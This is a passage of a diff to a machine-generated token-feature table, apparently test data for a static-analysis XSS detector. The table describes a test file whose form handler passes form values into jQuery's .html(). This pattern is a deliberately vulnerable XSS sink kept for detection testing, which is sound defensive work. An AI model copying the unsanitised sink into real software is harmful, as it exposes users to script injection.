contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:5:46:6 | onSubmi ... \\n }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | 'arguments' object of anonymous function | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | 'arguments' object of anonymous function | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | 'arguments' object of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | async v ... K\\n } | assignedToPropName | onSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | async v ... K\\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | async v ... K\\n } | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | async v ... K\\n } | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | async v ... K\\n } | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | async v ... K\\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | exceptional return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | exceptional return of anonymous function | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | exceptional return of anonymous function | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | exceptional return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | return of anonymous function | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | return of anonymous function | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:15:46:5 | return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:44:21:44:26 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:7 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:7 | $ | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:7 | $ | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:7 | $ | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:7 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | $("#id") | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | $("#id") | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | $("#id") | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | exceptional return of $("#id") | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | exceptional return of $("#id") | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:14 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:19 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:19 | $("#id").html | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:19 | $("#id").html | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:19 | $("#id").html | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:19 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | $("#id" ... stooge) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | $("#id" ... stooge) | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | $("#id" ... stooge) | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | $("#id" ... stooge) | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | $("#id" ... stooge) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | exceptional return of $("#id" ... stooge) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | exceptional return of $("#id" ... stooge) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | exceptional return of $("#id" ... stooge) | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | exceptional return of $("#id" ... stooge) | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:7:45:34 | exceptional return of $("#id" ... stooge) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:45:9:45:13 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:45:9:45:13 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:45:9:45:13 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24369,6 +159772,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:45:9:45:13 | "#id" | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | | autogenerated/Xss/XssThroughDom/forms.js:45:9:45:13 | "#id" | enclosingFunctionName | App | | autogenerated/Xss/XssThroughDom/forms.js:45:9:45:13 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:16:45:19 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:16:45:19 | html | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:45:16:45:19 | html | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:16:45:19 | html | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:16:45:19 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:21:45:26 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:21:45:26 | values | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:45:21:45:26 | values | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:21:45:26 | values | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:21:45:26 | values | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:45:21:45:33 | values.stooge | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:45:21:45:33 | values.stooge | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:45:21:45:33 | values.stooge | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24376,6 +159789,388 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:45:21:45:33 | values.stooge | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | | autogenerated/Xss/XssThroughDom/forms.js:45:21:45:33 | values.stooge | enclosingFunctionName | App | | autogenerated/Xss/XssThroughDom/forms.js:45:21:45:33 | values.stooge | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:45:28:45:33 | stooge | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:45:28:45:33 | stooge | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:45:28:45:33 | stooge | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:45:28:45:33 | stooge | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:45:28:45:33 | stooge | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:17 | initialValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:17 | initialValues | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:17 | initialValues | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:17 | initialValues | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:17 | initialValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:5:47:56 | initial ... alse }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:20:47:55 | { stoog ... false } | assignedToPropName | initialValues | +| autogenerated/Xss/XssThroughDom/forms.js:47:20:47:55 | { stoog ... false } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:20:47:55 | { stoog ... false } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:47:20:47:55 | { stoog ... false } | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:20:47:55 | { stoog ... false } | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:20:47:55 | { stoog ... false } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:27 | stooge | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:27 | stooge | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:27 | stooge | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:27 | stooge | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:27 | stooge | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:22:47:36 | stooge: 'larry' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:30:47:36 | 'larry' | assignedToPropName | stooge | +| autogenerated/Xss/XssThroughDom/forms.js:47:30:47:36 | 'larry' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:30:47:36 | 'larry' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:47:30:47:36 | 'larry' | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:30:47:36 | 'larry' | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:30:47:36 | 'larry' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:46 | employed | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:46 | employed | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:46 | employed | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:46 | employed | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:46 | employed | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:39:47:53 | employed: false | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:47:49:47:53 | false | assignedToPropName | employed | +| autogenerated/Xss/XssThroughDom/forms.js:47:49:47:53 | false | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:47:49:47:53 | false | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:47:49:47:53 | false | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:47:49:47:53 | false | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:47:49:47:53 | false | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:48:10 | render | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:48:10 | render | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:48:10 | render | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:48:10 | render | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:48:10 | render | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= 